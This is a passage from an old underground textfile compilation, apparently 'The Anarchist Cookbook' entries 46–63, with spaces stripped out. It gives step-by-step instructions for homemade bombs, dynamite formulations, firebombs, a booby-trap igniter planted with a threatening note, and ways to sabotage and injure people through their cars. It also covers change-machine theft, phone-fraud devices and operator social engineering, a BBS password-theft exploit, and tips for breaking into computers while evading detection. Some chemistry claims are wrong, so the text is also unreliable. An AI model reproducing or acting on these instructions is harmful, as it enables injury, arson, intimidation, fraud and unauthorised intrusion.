|_/_| |VERTICALWIRE|||

|HORIZONTALWIRE|_| *=+ *=+ *=+ *=+ *=+ *==_/_+ *******_/_++++++ || || || || || || |_____PHONE____| 46.CalciumCarbideBombbyTheJollyRoger ThisisEXTREMELYDANGEROUS.Exerciseextremecaution....Obtainsomecalcium carbide.Thisisthestuffthatisusedincarbidelampsandcanbefoundat nearlyanyhardwarestore.Takeafewpiecesofthisstuff(itlookslike gravel)andputitinaglassjarwithsomewater.Putalidontightly.The carbidewillreactwiththewatertoproduceacetylenecarbonatewhichis similartothegasusedincuttingtorches.Eventuallytheglasswithexplode frominternalpressure.Ifyouleaveaburningragnearby,youwillgetanice fireball! 47.MoreWaystoSendaCartoHellbyTheJollyRoger Duetoalotofcompliments,Ihavewrittenanupdatetofile#14.Ihaveleft theoriginalintact.Thisexpandsupontheoriginalidea,andcouldbewell calledasequel. Howtohavephunwithsomeoneelse'scar.Ifyoureallydetestsomeone,andI meandetest,here'safewtipsonwhattodoinyoursparetime.Movethe windshieldwiperblades,andinsertandgluetacks.Thetacksmakelovely designs.Ifyour"friend"goestoschoolwithyou,Justbeforehecomesoutof school.Lightalighterandthenputitdirectlyunderneathhiscardoor handle.Wait...Leave...Listen.Whenyouhearaloud"shit!",youknowhemade ittohiscarintime.Removehismufflerandpourapproximately1Cupofgas init.Putthemufflerback,thenwaittilltheircarstarts.Thenyouhavea cigarettelighter.A30footlongcigarettelighter.Thisoneiseffective,and anyfoolcandoit.Removethetopairfilter.That'sit!Oraoldiebut goodie:sugarinthegastank.Stuffragssoakedingasuptheexhaustpipe. Thenyouwonderwhyyour"friend"hastroublewithhis/herlungs.Here'sone thattakestimeandmanyfriends.Takehis/hercarthenbreakintotheirhouse andreassembleit,intheirlivingorbedroom.Phuneh?Ifyou'reinto engines,sayeeniminemoeandpointtosomethingandremoveit.Theywonderwhy somethingdoesn'twork.Therearesomanyothers,buttherealgoodjuicyones comebythinkinghard. 48.RippingoffChangeMachinesbyTheJollyRoger Haveyoueverseenoneofthosereallybigchangermachinesinairports Laundromatsorarcadesthatdispensechangewhenyouputinyour1or5dollar bill?Wellthen,hereisanarticleforyou. 1. Findthetypeofchangemachinethatyouslideinyourbilllengthwise,

notthetypewhereyouputthebillinatrayandthenslidethetrayin!!! 2. Afterfindingtherightmachine,geta$1or$5bill.Startcrumplingup intoaball.Thensmoothoutthebill,nowitshouldhaveaverywrinkly surface. 3. Nowthehardpart.Youmusttearanotchinthebillontheleftside aboutinchbelowthelittle1dollarsymbol(SeeFigure). 4. Ifyouhavedoneallofthisrightthentakethebillandgooutthe machine.Putthebillinthemachineandwait.Whatshouldhappenis:whenyou putyourbillinthemachineitthinkseverythingisfine.Whenitgetstothe partofthebillwiththenotchcutout,themachinewillrejectthebilland (ifyouhavedoneitright)giveyouthechangeatthesametime!!!So,youend upgettingyourbillback,plusthechange!!Itmighttakealittlepractice, butonceyougetthehangofit,youcangetalotofmoney! \Makenotchhere.About"downfromthe1. 49.ClearBoxPlansbyTheJollyRoger Theclearboxisanewdevicewhichhasjustbeeninventedthatcanbeused throughoutCanadaandruralUnitedStates.Theclearboxworkson"PostPay" payphones(fortressfones).Thosearethepayphonesthatdon'trequirepayment untilaftertheconnectionisestablished.Youpickupthefone,getadial tone,dialyournumber,andtheninsertyourmoneyafterthepersonanswers.If youdon'tdepositthemoneythenyoucannotspeaktothepersonontheother endbecauseyourmouthpieceiscutoffbutnottheearpiece.(obviouslythese phonesareniceforfreecallstoweatherortimeorothersuchrecordings).All youmustdoistogotoyournearbyRadioShack,orelectronicsstore,andgeta fourtransistoramplifierandatelephonesuctioncupinductionpickup.The inductionpickupwouldbehookedupasitnormallywouldtorecorda conversation,exceptthatitwouldbepluggedintotheoutputoftheamplifier andamicrophonewouldbehookedtotheinput.Sowhenthepartythatisbeing calledanswers,thecallercouldspeakthroughthelittlemicrophoneinstead. Hisvoicethengoesthroughtheamplifierandouttheinductioncoil,andinto thebackofthereceiverwhereitwouldthenbebroadcastthroughthephone linesandtheotherpartywouldbeabletohearthecaller.TheClearBoxthus 'clearsup'theproblemofnotbeingheard.Luckily,thelinewillnotbecut offafteracertainamountoftimebecauseitwillwaitforeverforthecoinsto beputin.Thebiggestadvantageforallofusaboutthisnewclearboxisthe factthatthistypeofpayphonewillmostlikelybecomeverycommon.Duetoa fewthings:1st,itisacheapwayofgettingtheDTF,dialtonefirstservice, 2nd,itdoesn'trequireanyspecialequipment,(forthephonecompany)This payphonewillworkonanyphoneline.Usuallyapayphonelineisdifferent,but thisisaregularphonelineanditissetupsothephonedoesallthe charging,notthecompany. 50.CNAListbyTheJollyRoger NPA 201 202 203 204 205 206 207 208 209 TELNUMBER NPA 2016767070 3043437016 2037896815 2049490900 2059887000 2063825124 6177875300 3032938777 4155432861 TELNUMBER NPA TELNUMBER 415 4155436374 709 416 4164430542 712 417 3147216626 713 418 5147252491 714 419 6144640123 715 501 4052366121 716 502 5025832861 717 503 2063825124 718 504 5042455330 801 ***NONE*** 4025802255 7138617194 8185017251 6082526932 5184718111 4126335600 5184718111 3032938777

212 213 214 215 216 217 218 219 301 302 303 304 305 306 307 308 309 312 313 314 315 316 317 318 319 401 402 403 404 405 406 408 409 412 413 414

5184718111 4157815271 2144647400 4126335600 6144640123 2175255800 4025802255 3172654834 3043431401 4126335600 3032938777 3043448041 9127840440 3063472878 3032938777 4025802255 2175255800 3127969600 3132238690 3147216626 5184718111 8162752782 3172654834 5042455330 4025802255 6177875300 4025802255 4034252652 9127840440 4052366121 3032938777 4155436374 7138617194 4136335600 6177875300 6082526932

505 506 507 509 512 513 514 515 516 517 518 519 601 602 603 604 605 606 607 608 609 612 613 614 615 616 617 618 619 701 702 703 704 705 706 707

3032938777 5066483041 4025802255 2063825124 5128282501 6144640123 5147252491 4025802255 5184718111 3132238690 5184718111 4164430542 6019618139 3032938777 6177875300 6044322996 4025802255 5025832861 5184718111 6082526932 2016767070 4025802255 4164430542 6144640123 6153735791 3132238690 6177875300 2175255800 8185017251 4025802255 4155432861 3043447935 9127840440 4169793469 ***NONE*** 4155436374

802 803 804 805 806 807 808 809 812 813 814 815 816 817 818 819 901 902 904 906 907 912 913 914 915 916 918 919 900

6177875300 9127840440 3043447935 4155432861 5128282501 4164430542 2123344336 2123344336 3172654834 8132287871 4126335600 2175255800 8162752782 2144647400 4157815271 5147252491 6153735791 9024214110 9127840440 3132238690 ***NONE*** 9127840440 8162752782 5184718111 5128282501 4155432861 4052366121 9127840440 2016767070

51.ElectronicTerrorismbyTheJollyRoger 1. Itstartswhenabig,dumblummoxrudelyinsultsyou.Beingofa rational,intelligentdisposition,youwiselychoosetoavoida(direct) confrontation.Butashelaughsinyourface,yousmileinwardlyyourrevenge isalreadyplanned. 2. Followyourvictimtohislocker,car,orhouse.Onceyouhavechosen yourtargetsite,laylowforaweekormore,lettingyourangerboil. 3. Inthemeantime,assembleyourversatileterroristkit(detailsbelow.)

4. PlantyourkitatthedesignatedtargetsiteonaMondaymorningbetween thehoursof4:00amand6:00am.Includeacalm,suggestivenotethatquietly hintsatthepossibilityofanotherattack.Donotwriteitbyhand!An exampleofaneffectivenote:"don'tbesuchajerk,orthenextonewilltake offyourhand.Haveaniceday."Noticehowthecalmtoneinstillsfear.Asif writtenbyahomicidalpsychopath. 5. Chooseastrategiclocationoverlookingthetargetsite.Trytoposition yourselfinsuchawaythatyoucanseehisfacialcontortions. 6. Sitbackandenjoythefireworks!Assemblyoftheversatile,economic,and effectiveterroristkit#1:thepartsyou'llneedare: 4AAbatteries

19voltbattery 1SPDTminirelay(radioshack) 1rocketengine(smokebomborm80) 1solarigniter(anyhobbystore) 19voltbatteryconnector

1. Takethe9voltbatteryandwireitthroughtherelay'scoil.Thiscircuit shouldalsoincludeapairofcontactsthatwhenseparatedcutoffthiscircuit. Thesecontactsshouldbeheldtogetherbytrappingthembetweenthelocker, mailbox,orcardoor.Oncethedoorisopened,thecontactsfallapartandthe 9voltcircuitisbroken,allowingtherelaytofalltotheclosedpositionthus closingtheignitioncircuit.(Ifallthisisconfusingtakealookatthe schematicbelow.) 2. Takethe4AAbatteriesandwiretheminsuccession.Wirethepositive terminalofonetothenegativeterminalofanother,untilallfourare connectedexceptonepositiveterminalandonenegativeterminal.Eventhough thefourAAbatteriesonlycombinetocreate6volts,theincreaseinamperage isnecessarytoactivatethesolarigniterquicklyandeffectively. 3. Takethebatterypack(madeinstep2)andwireoneendofittothe relay'ssinglepoleandtheotherendtooneprongofthesolarigniter.Then wiretheotherprongofthesolarigniterbacktotheopenpositiononthe relay. 4. Usingdoublesidedcarpettapemountthekitinhislocker,mailbox,or cardoor.Andlast,insertthesolarigniterintotherocketengine(smokebomb orm80). Yourkitisnowcomplete! >< I(CONTACTS)I II I(BATTERY) I II I(COIL)I /////// / /I /I /I (SWITCH)II II I(BATTERY) I(PACK) I II II II * (SOLARIGNITER) 52.HowtoStartAConferencew/o2600hzorMFbyTheJollyRoger Thismethodofstartingtheconf.Dependsonyourabilitytobullshitthe operatorintodialinganumberwhichcanonlybereachedwithanoperator'sMF tones.Whenbullshittingtheoperatorrememberoperator'sarenothiredto

thinkbuttodo. Hereisastepbystepwaytotheconf.: Calltheoperatorthroughapbxorextender,youcouldjustcalloneThrough yourlinebutIwouldn'trecommendit. Saytotheoperator:TSPSmaintenanceengineer,ringforwardto213+080+1100, positionrelease,thankyou.(shewillprobablyaskyouforthenumberagain) Definitions: Ringforwardinstructshertodialthenumber. Positionreleaseinstructshertoreleasethetrunkaftershehasdialedthe number. +remembertosay213plus080plus1100. 3.Whenyouareconnectedwiththeconf.Youwillhereawhistleblowtwiceand arecordingaskingyouforyouroperatornumber.Dialinanyfivedigitsandhit thepoundssignacoupleoftimes.Simplydialinthenumberofthebillingline ect.Whentherecordingaskforit.Wheninthecontrolmodeoftheconf.Hit '6'totransfercontrol.Hit'001'toreenterthenumberofconferee'sandtime amountwhichyougavewhenyoustaredtheconf.Rememberthesizecanbefrom2 59conferee's.Ihavenotfoundoutthe'lengths'limits.

53.HowtoMakeDynamitebyTheJollyRoger Dynamiteisnothingmorethanjustnitroglycerinandastabilizingagenttomake itmuchsafertouse.Thenumbersarepercentages,besuretomixthese carefullyandbesuretousetheexactamounts.Thesepercentagesareinweight ratio,notvolume. Number Ingredients 1st Nitroglycerin SodiumNitrate Woodmeal 10% AmmoniumOxalate Guncotton 1% 2nd Nitroglycerin PotassiumNitrate SodiumNitrate Woodmeal 9% AmmoniumOxalate 3rd Nitroglycerin PotassiumNitrate Woodmeal 6% Guncotton 2% Vaseline 5% PowderedCharcoal 4th Nitroglycerin PotassiumNitrate Woodmeal 34% BariumNitrate Starch 10% 5th Nitroglycerin PotassiumNitrate Woodmeal 9% AmmoniumOxalate Guncotton 3% 6th Nitroglycerin SodiumNitrate Woodmeal 5% Amount 32% 28% 29% 24% 9% 56% 2% 35% 44%

6% 25% 26% 5% 57% 19% 12% 18% 70%

7th 8th 9th 10th 11th 12th 13th 14th 15th 16th 17th 18th 19th

PotassiumChloride 4% Chalk 2% Nitroglycerin 26% Woodmeal 40% BariumNitrate 32% SodiumCarbonate 2% Nitroglycerin 44% Woodmeal 12% AnhydrousSodiumSulfate Nitroglycerin 24% PotassiumNitrate 32% Woodmeal 33% AmmoniumOxalate 10% Nitroglycerin 26% PotassiumNitrate 33% Woodmeal 41% Nitroglycerin 15% SodiumNitrate 62.9% Woodmeal 21.2% SodiumCarbonate .9% Nitroglycerin 35% SodiumNitrate 27% Woodmeal 10% AmmoniumOxalate 1% Nitroglycerin 32% PotassiumNitrate 27% Woodmeal 10% AmmoniumOxalate 30% Guncotton 1% Nitroglycerin 33% Woodmeal 10.3% AmmoniumOxalate 29% Guncotton .7% PotassiumPerchloride 27% Nitroglycerin 40% SodiumNitrate 45% Woodmeal 15% Nitroglycerin 47% Starch 50% Guncotton 3% Nitroglycerin 30% SodiumNitrate 22.3% Woodmeal 40% PotassiumChloride 7.2% Nitroglycerin 50% SodiumNitrate 32.6% Woodmeal 17% AmmoniumOxalate .4% Nitroglycerin 23% PotassiumNitrate 27% Woodmeal 37% AmmoniumOxalate 8% BariumNitrate 4% CalciumCarbonate %

44%

Ifyoucan'tseemtogetoneormoreoftheingredientstryanotherone.Ifyou stillcan't,youcanalwaysbuysmallamountsfromyourschool,ormaybefrom variouschemicalcompanies.Whenyoudothat,besuretosayaslittleas possible,ifduringtheschoolyear,andtheyask,sayit'sforaexperimentfor school.

54.AutoExhaustFlameThrowerbyTheJollyRoger Forthisone,allyouneedisacar,asparkplug,ignitionwireandaswitch. Installthesparkplugintothelastfourorfiveinchesofthetailpipeby drillingaholethattheplugcanscrewintoeasily.Attachthewire(thisis regularinsulatedwire)toonesideoftheswitchandtothesparkplug.The othersideoftheswitchisattachedtothepositiveterminalonthebattery. Withthecarrunning,simplyhittheswitchandwatchtheflamesfly!!!Againbe carefulthatnooneisbehindyou!Ihaveseensomeoftheseflamesgo20 feet!!! 55.BreakingintoBBSExpressbyTheJollyRoger IfyouhavehighenoughaccessonanyBBSExpressBBSyoucangettheSysop's passwordwithoutanyproblemsandbeabletologonashimanddowhateveryou like.DownloadthePassfile,deletethewholeBBS,anything.Itsallamatter ofuploadingatextfileanddownloadingitfromtheBBS.Youmusthavehigh enoughaccesstoseenewuploadstodothis.Ifyoucanseeafileyoujust uploadedyouhavetheabilitytobreakintotheBBSinafeweasysteps.Whyam ItellingeveryonethiswhenIrunBBSExpressmyself?Wellthereisonewayto stopthisfromhappeningandIwantotherSysopstobeawareofitandnothave ithappentothem.BreakinginisallbasedontheMENUfunctionofBBSExpress. Expresswillletyoucreateamenutodisplaydifferenttextfilesbyputting thewordMENUatthetopofanytextfileandstatingwhatfilesaretobe displayed.ButduetoamajorscrewupbyMr.LedbetteryoucanusethisMENU optiontodisplaytheUSERLOGandtheSysop'sPasswordsoranythingelseyou like.IwillshowyouhowtogettheSysop'spassandthereforelogonasthe Sysop.BBsExpressSysop'shave2passwords.Onelikeeveryoneelsegetsinthe formofX1XXX,andaSecondarypasswordtomakeithardertohackouttheSysops pass.TheSecondarypassisfoundinafilecalledSYSDATA.DAT.Thisfilemust beondrive1andisthereforeeasytoget. AllyouhavetodoisuploadthissimpleTextfile: MENU 1 D1:SYSDATA.DAT Ripofftime! AfteryouuploadthisfileyoudownloaditnonXmodem.StupidExpressthinks itisdisplayingamenuandyouwillseethis: Ripofftime! Selection[0]: Justhit1andExpresswilldisplaytheSYSDATA.DATfile.OPPASSiswherethe Sysop'sSecondarypasswillbe.D1:USERLOG.DATiswhereyouwillfindthename andDrivenumberoftheUSERLOG.DATfile.TheSysopmighthaverenamedthisfile orputitinaSubdirectoryorevenonadifferentdrive.IWillAssumeheleft itasD1:USERLOG.DAT.Theotherpartsofthisfiletellyouwherethe.HLP screensareandwheretheLOGissavedandalltheDownloadpathnames. NowtogettheSysop'sprimarypassyouuploadatextfilelikethis: MENU 1 D1:USERLOG.DAT BreakingintoBedwetter'sBBS

AgainyouthendownloadthisfilenonXmodemandyouwillsee: BreakingintoBedwetter'sBBS Selection[0]: Youthenhit1andthelongUSERLOG.DATfilecomesflyingatyou.TheSysopis thefirstentryinthisverylongfilesoitiseasy.Youwillsee: SYSOP'SNAMEX1XXX Youshouldnowhavehis2passwords. ThereisonlyoneeasywayoutofthisthatIcanthinkof,andthatistomake allnewuploadsgotoSYSOPlevel(Level9)accessonly.Thiswaynobodycan pulloffwhatIjustexplained.IfeelthisisamajorBugonMr.Ledbetter's part.Ijustdon'tknowwhynoonehadthoughtofitbefore.Iwouldliketo givecredittoRedlineforthemessageheleftonModemHelltellingaboutthis problem,andalsotoUnkaforhisideasandinputaboutcorrectingit. 56.FirebombsbyTheJollyRoger Mostfirebombsaresimplygasolinefilledbottleswithafuelsoakedraginthe mouth(thebottle'smouth,notyours).TheoriginalMolotovcocktail,andstill aboutthebest,wasamixtureofonepartgasolineandonepartmotoroil.The oilhelpsittoclingtowhatitsplatterson.Someuseonepartroofingtarand onepartgasoline.Firebombshavebeenfoundwhichweremadebypouringmelted waxintogasoline. 57.FuseIgnitionBombbyTheJollyRoger Afourstrandhomemadefuseisusedforthis.Itburnslikefury.Itisheld downandconcealedbyastripofbenttincutfromacan.Theexposedendofthe fuseisdippedintotheflareigniter.Tousethisone,youlightthefuseand holdthefirebombuntilthefusehasburnedoutofsightunderthetin.Then throwitandwhenitbreaks,theburningfusewillignitethecontents. 58.GenericBombbyTheJollyRoger 1. Acquireaglasscontainer. 2. Putinafewdropsofgasoline. 3. Capthetop. 4. Nowturnthecontaineraroundtocoattheinnersurfacesandthen evaporates. 5. Addafewdropsofpotassiumpermanganate(Getthisstufffromasnake bitekit) 6. Thebombisdetonatedbythrowingagainstasolidobject. Afterthrowingthisthing,runlikehell.Thisthingpacksaboutstickof dynamite. 59.GreenBoxPlansbytheJollyRoger Payingtheinitialrateinordertousearedbox(oncertainfortresses)lefta sourtasteinmanyredboxersmouths,thusthegreenboxwasinvented.Thegreen boxgeneratesusefultonessuchasCOINCOLLECT,COINRETURN,ANDRINGBACK. ThesearethetonesthatACTSortheTSPSoperatorwouldsendtotheCOwhen appropriate.Unfortunately,thegreenboxcannotbeusedatthefortressstation butmustbeusedbytheCALLEDparty.

Herearethetones: COINCOLLECT700+1100hz COINRETURN1100+1700hz RINGBACK700+1700hz Beforethecalledpartysendsanyofthesetones,anoperatorreleasesignal shouldbesenttoalerttheMFdetectorsattheCO.Thiscanbedonebysending 900hz+1500hzorasingle2600wink(90ms.)Alsodonotforgetthatthe initialrateiscollectedshortlybeforethe3minuteperiodisup. Incidentally,oncetheaboveMFtonesforcollectingandreturningcoinsreach theCO,theyareconvertedintoanappropriateDCpulse(130voltsforreturn and+130forcollect).Thispulseisthensentdownthetiptothefortress. Thiscausesthecoinrelaytoeitherreturnorcollectthecoins.Thealleged "Tnetwork"takesadvantageofthisinformation.Whenapulseforcoincollect (+130VDC)issentdowntheline,itmustbegroundedsomewhere.Thisisusually theyelloworblackwire.Thus,ifthewiresareexposed,thesewirescanbecut topreventthepulsefrombeinggrounded.Whenthethreeminuteinitialperiod isalmostup,makesurethattheblackandyellowwiresaresevered,thenhang up,waitabout15secondsincaseofasecondpulse,reconnectthewires,pick upthephone,andifallgoeswell,itshouldbe"JACKPOT"time. 60.PortableGrenadeLauncherbyTheJollyRoger Ifyouhaveabow,thisoneisforyou.Removetheferrulefromanaluminum arrow,andfillthearrowwithblackpowder(IusegradeFFFF,itburnseasy)and thenglueashotshellprimerintotheholeleftwheretheferrulewent.Next, glueaBBontheprimer,andyouarereadytogo!Makesurenooneisnearby.... Littleshredsofaluminumgoallovertheplace!! 61.HackingTutorialbyTheJollyRoger Whatishacking? AccordingtopopularbeliefthetermhackerandhackingwasfoundedatMITit comesfromtherootofahackwriter,someonewhokeeps"hacking"atthe typewriteruntilhefinishesthestory.Acomputerhackerwouldbehackingat thekeyboardorpasswordworks. Whatyouneed: Tohackyouneedacomputerequippedwithamodem(adevicethatletsyou transmitdataoverphonelines)whichshouldcostyoufrom$100to$1200. Howdoyouhack? Hackingrequirestwothings: 1. Thephonenumber. 2. Answertoidentityelements. Howdoyoufindthephonenumber? Therearethreebasicwaystofindacomputersphonenumber: 1. Scanning 2. Directory 3. Insideinfo Whatisscanning? Scanningistheprocessofhavingacomputersearchforacarriertone.For example,thecomputerwouldstartat(800)1111111andwaitforcarrierif thereisnoneitwillgoonto1111112etc.Ifthereisacarrieritwill recorditforfutureuseandcontinuelookingformore. Whatisdirectoryassistance? Thiswaycanonlybeusedifyouknowwhereyourtargetcomputeris.Forthis

examplesayitisinmenlopark,CAandthecompanynameisSri. 1. Dial411(or4155551212) 2. Say"Menlopark" 3. Say"Sri" 4. Writedownnumber 5. Askifthereareanymorenumbers 6. Ifsowritethemdown. 7. Hanguponoperator 8. Dialallnumbersyouweregiven 9. Listenforcarriertone 10. Ifyouhearcarriertonewritedownnumber,callitonyourmodemandyour settohack! 62.TheBasicsofHackingIIbyTheJollyRoger Basicstoknowbeforedoinganything,essentialtoyourcontinuingcareerasone oftheeliteinthecountry...Thisarticle,"Theintroductiontotheworldof hacking."ismeanttohelpyoubytellingyouhownottogetcaught,whatnotto doonacomputersystem,whattypeofequipmentshouldIknowaboutnow,and justalittleonthehistory,pastpresentfuture,ofthehacker. Welcometotheworldofhacking!We,thepeoplewholiveoutsideofthenormal rules,andhavebeenscornedandevenarrestedbythosefromthe'civilized world',arebecomingscarcereveryday.Thisisduetothegreaterfearofwhat agoodhacker(skillwise,nomoraljudgmentshere)candonowadays,thus causingantihackersentimentinthemasses.Also,fewhackersseemtoactually knowaboutthecomputersystemstheyhack,orwhatequipmenttheywillruninto onthefrontend,orwhattheycoulddowrongonasystemtoalertthe'higher' authoritieswhomonitorthesystem.Thisarticleisintendedtotellyouabout somethingsnottodo,evenbeforeyougetonthesystem.Iwilltellyouabout thenewwaveoffrontendsecuritydevicesthatarebeginningtobeusedon computers.Iwillattempttoinstillinyouasecondidentity,tobebroughtup attimeofgreatneed,topullyououtoftrouble.And,bytheway,Itakeno, repeat,no,responsibilityforwhatwesayinthisandtheforthcomingarticles. Enoughofthebullshit,ontothefun:afterloggingonyourfavoritebbs,you seeonthehighaccessboardaphonenumber!Itsaysit'sagreatsystemto "fuckaroundwith!"Thismaybetrue,buthowmanyotherpeoplearegoingto callthesamenumber?So:trytoavoidcallinganumbergiventothepublic. Thisisbecausethereareatleasteveryotherusercalling,andhowmanyother boardswillthatnumberspreadto?Ifyoucallanumberfar,faraway,andyou planongoingthroughanextenderorareseller,don'tkeepcallingthesame accessnumber(I.E.Asyouwouldifyouhadahackerrunning),thislooksvery suspiciousandcanmakelifemiserablewhenthephonebillcomesinthemail. Mostcitieshaveavarietyofaccessnumbersandservices,souseasmanyasyou can.Nevertrustachangeinthesystem...The414's,theassholes,werecaught forthisreason:whenoneofthemconnectedtothesystem,therewasnothing goodthere.Thenexttime,therewasatrekgamestuckrightintheirway! Theyproceededtoplaysaidgamefortwo,saytwoandahalfhours,while telenetwastracingthem!Nicejob,don'tyouthink?Ifanythinglooks suspicious,dropthelineimmediately!!Asin,yesterday!!Thepointwe're tryingtogetacrossis:ifyouusealittlecommonsense,youwon'tgetbusted. Letthelittlekidswhoaren'tsmartenoughtorecognizeatrapgetbusted,it willtaketheheatoffoftherealhackers.Now,let'ssayyougetonacomputer system...Itlooksgreat,checksout,everythingseemsfine.OK,nowiswhenit getsmoredangerous.Youhavetoknowthecomputersystemtoknowwhatnotto do.Basically,keepawayfromanycommandsomething,copyanewfileintothe account,orwhatever!Alwaysleavetheaccountinthesamestatusyouloggedin with.Change*nothing*...Ifitisn'tanaccountwithpriv's,thendon'ttry anycommandsthatrequirethem!All,yesall,systemsaregoingtobekeeping logfilesofwhatusersaredoing,andthatwillshowup.Itisjustlike

droppingatroublecardinanESSsystem,aftersendingthatniceoperatora prettytone.Spendnoexcessiveamountsoftimeontheaccountinonestretch. Keepyourcallingtotheverylatenightifpossible,orduringbusinesshours (believeitornot!).Itsohappensthattherearemoreusersonduring businesshours,anditisverydifficulttoreadalogfilewith60usersdoing manycommandseveryminute.Trytoavoidsystemswhereeveryoneknowseach other,don'ttrytobluff.Andaboveall:neveractlikeyouownthesystem,or arethebestthereis.Theyalwaysgrabthepeoplewho'sheadsswell...Thereis someveryinterestingfrontendequipmentaroundnowadays,butfirstlet's defineterms...Byfrontend,wemeananydevicethatyoumustpassthroughto getattherealcomputer.Therearedevicesthataremadetodefeathacker programs,andjustplainoldmultiplexers.Todefeathackerprograms,thereare nowdevicesthatpickupthephoneandjustsitthere...Thismeansthatyour devicegetsnocarrier,thusyouthinkthereisn'tacomputerontheotherend. Theonlywayarounditistodetectwhenitwaspickedup.Ifitpicksupafter thesamenumberring,thenyouknowitisahackerdefeater.Thesedevicestake amultidigitcodetoletyouintothesystem.Someare,infact,quite sophisticatedtothepointwhereitwillalsolimittheusername'sdown,so onlyonenameorsetofnamescanbevalidloginsaftertheyinputthecode... Otherdevicesinputanumbercode,andthentheydialbackapreprogrammed numberforthatcode.Thesesystemsarebesttoleavealone,becausetheyknow someoneisplayingwiththeirphone.Youmaythink"butI'lljustreprogramthe dialback."Thinkagain,howstupidthatis...Thentheyhaveyournumber,ora testloopifyouwerejustalittlesmarter.Ifit'syournumber,theyhaveyour balls(ifmale...),ifitsaloop,thenyouarescrewedagain,sincethoseloops are*monitored*.Asformultiplexers...Whataplexerissupposedtodoisthis: Thesystemcanacceptmultipleusers.Wehavetotimeshare,sowe'llletthe frontendprocessordoit...Well,thisiswhatamultiplexerdoes.Usually theywillaskforsomethinglike"enterclass"or"line:".Usuallyitis programmedforadoubledigitnumber,orafourtofiveletterword.Thereare usuallyafewsetsofnumbersitaccepts,butthosenumbersalsosetyour 300/1200/2400bauddatatype.Thesemultiplexersareinconvenientatbest,so nottoworry.Alittleaboutthehistoryofhacking:hacking,bymydefinition, meansagreatknowledgeofsomespecialarea.Doctorsandlawyersarehackersof asort,bythisdefinition.Butmostoften,itisbeingusedinthecomputer context,andthuswehaveadefinitionof"anyonewhohasagreatamountof computerortelecommunicationsknowledge."Youarenotahackerbecauseyou havealistofcodes...Hacking,bymydefinition,hasthenbeenaroundonly about15years.Itstarted,whereelsebut,MITandcollegeswheretheyhad computerscienceorelectricalengineeringdepartments.Hackershavecreated someofthebestcomputerlanguages,themostawesomeoperatingsystems,and evengoneontomakemillions.Hackingusedtohaveagoodname,whenwecould honestlysay"weknowwhatwearedoing".Nowitmeans(inthepubliceye):the 414's,RonAustin,theNASAhackers,thearpanethackers...Allthepeoplewho havebeencaught,havedonedamage,andarenowgoingtohavetofacefinesand sentences.Thuswecomepastthemoralisticcrap,andtoourpurpose:educate thehackercommunity,returntothedayswhenpeopleactuallyknewsomething... 63.HackingDEC'sbyTheJollyRoger Inthisarticleyouwilllearnhowtologintodec's,loggingout,andallthe funstufftodoinbetween.Allofthisinformationisbasedonastandarddec system.Sincetherearedecsystems10and20,andIfavor,thedec20,there willbemoreinfoontheminthisarticle.Itjustsohappensthatthedec20 isalsothemorecommonofthetwo,andisusedbymuchmoreinterestingpeople (ifyouknowwhatImean...)OK,thefirstthingyouwanttodowhenyouare receivingcarrierfromadecsystemistofindouttheformatofloginnames. Youcandothisbylookingatwhoisonthesystem. Dec=>`(the'exec'levelprompt) you=>sy

sy:shortforsy(stat)andshowsyouthesystemstatus. Youshouldseetheformatofloginnames.Asystatusuallycomesupinthis form: JobLineProgramUser Job:Thejobnumber(notimportantunlessyouwanttologthemofflater) Line:Whatlinetheyareon(usedtotalktothem...)Thesearebothtwoor threedigitnumbers. Program:Whatprogramaretheyrunningunder?Ifitsays'exec'theyaren't doinganythingatall... User:ahhhahhhh!Thisistheusernametheyareloggedinunder...Copythe format,andhackyourselfoutaworkingcode...Loginformatisassuch: dec=>` you=>loginusernamepassword Usernameistheusernameintheformatyousawaboveinthesystat.Afteryou hitthespaceafteryourusername,itwillstopechoingcharactersbacktoyour screen.Thisisthepasswordyouaretypingin...Remember,peopleusuallyuse theirname,theirdog'sname,thenameofafavoritecharacterinabook,or somethinglikethis.Afewcleverpeoplehaveitsettoakeycluster(qwertyor asdfg).Passwordscanbefrom1to8characterslong,anythingafterthatis ignored.Youarefinallyin...Itwouldbenicetohavealittlehelp,wouldn't it?Justtypea?Orthewordhelp,anditwillgiveyouawholelistof topics...Somehandycharactersforyoutoknowwouldbethecontrolkeys, wouldn'tit?Backspaceonadec20isrubwhichis255onyourASCIIchart.On thedec10itiscontrolH.Toabortalonglistingoraprogram,controlC worksfine.UseControlOtostoplongoutputtotheterminal.Thisishandy whenplayingagame,butyoudon'twanttocontrolCout.ControlTforthe time.Controluwillkillthewholelineyouaretypingatthemoment.Youmay accidentallyrunaprogramwheretheonlywayoutisacontrolX,sokeepthat inreserve.Controlstostoplisting,controlQtocontinueonbothsystems.Is yourterminalhavingtrouble??Like,itpausesfornoreason,oritdoesn't backspaceright?Thisisbecausebothsystemssupportmanyterminals,andyou haven'ttolditwhatyoursisyet...YouareusingaVT05soyouneedtotellit youareone. Dec=>` you=>informationterminal or You=>info (Thisshowsyouwhatyourterminalissetupas.) Dec=>allsortsofshit,thenthe` you=>settervt05 (ThissetsyourterminaltypetoVT05.) Nowlet'sseewhatisintheaccount(hereafterabbreviatedacct.)thatyou havehackedonto.Say: =>dir (Shortfordirectory.) Itshowsyouwhattheuserofthecodehassavetothedisk.Thereshouldbea formatlikethis:xxxxx.Oooxxxxxisthefilename,from1to20characterslong. Oooisthefiletype,oneof:exe,txt,dat,bas,cmdandafewothersthat aresystemdependant.Exeisacompiledprogramthatcanberun(justbytyping itsnameatthe`) Txtisatextfile,whichyoucanseebytyping: =>typexxxxx.Txt Donottryto: =>typexxxxx.Exe

(Thisisverybadforyourterminalandwilltellyouabsolutelynothing.) Datisdatatheyhavesaved. Basisabasicprogram,youcanhaveittypedoutforyou. Cmdisacommandtypefile,alittletoocomplicatedtogointohere.Try: =>takexxxxx.Cmd Bytheway,thereareotherusersouttherewhomayhavefilesyoucanuse. (Gee,whyelseamIhere?) =>dir<*.*>(Dec20) =>dir[*,*](Dec10) *isawildcard,andwillallowyoutoaccessthefilesonotheraccountsifthe userhasitsetforpublicaccess.Ifitisn'tsetforpublicaccess,thenyou won'tseeit.Torunthatprogram: dec=>` you=>usernameprogramname Usernameisthedirectoryyousawthefilelistedunder,andfilenamewaswhat elsebutthefilename?**Youarenotalone**remember,yousaid(atthe verystart)syshortforsystat,andhowwesaidthisshowedtheotheruserson thesystem?Well,youcantalktothem,oratleastsendamessagetoanyone youseelistedinasystat.Youcandothisby: dec=>theuserlist(fromyoursystat) you=>talkusername(Dec20) sendusername(Dec10) 